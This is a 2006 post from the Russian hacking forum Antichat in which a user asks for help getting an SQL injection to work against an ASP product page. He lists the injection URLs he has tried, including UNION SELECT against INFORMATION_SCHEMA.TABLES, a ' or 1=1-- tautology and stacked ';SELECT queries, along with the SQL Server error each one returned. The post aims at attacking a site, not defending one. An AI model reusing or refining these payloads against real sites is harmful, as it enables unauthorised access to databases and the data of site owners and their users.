Форум АНТИЧАТ - Редкая трабла с MsSQL

Редкая трабла с MsSQL

05.06.2006, 02:30

~~Xex~~

Banned

Регистрация: 10.07.2005

Сообщений: 224

Провел на форуме:
1062041

Репутация: 50

Редкая трабла с MsSQL

Привет!
нашел инъекцию следующего вида
http://www.server.com/products.asp?cat=Cars'

Код:

Microsoft OLE DB Provider for SQL Server error '80040e14' 

Unclosed quotation mark before the character string 'CAR''. 

/include/ADOFunctions.asp, line 58

При попытке написать UNION:
http://www.server.com/products.asp?cat=CAR'%20UNION%20ALL%20SELECT%20*%2 0FROM%20INFORMATION_SCHEMA.TABLES--

ругается

Код:

Microsoft OLE DB Provider for SQL Server error '80040e14' 

Incorrect syntax near the keyword 'UNION'. 

/include/ADOFunctions.asp, line 58

Проверил синтакцис сто раз.
фильтрации никакой,
запросы вида
http://www.server.com/products.asp?cat=CAR' or 1=1--
ругется на синтакцис "or".

products.asp?cat=CAR';SELECT%20*%20FROM%20INFORMAT ION_SCHEMA.TABLES--
работает без проблем,
Думал фильтрует юнионы, оры и энды,но запрос вида

products.asp?cat=CAR';SELECT%20*%20FROM%20INFORMAT ION_SCHEMA.TABLES%20UNION%20SELECT%20*%20FROM%20IN FORMATION_SCHEMA.TABLES--
тоже успешно выполняется.

Думал, что все фильтруется после кавычки, однако если ввести немного "подпорченный" запрос(последний прведенный), то он ругается.

Помогите советом.
Пасиб.

Последний раз редактировалось Xex; 05.06.2006 в 02:32..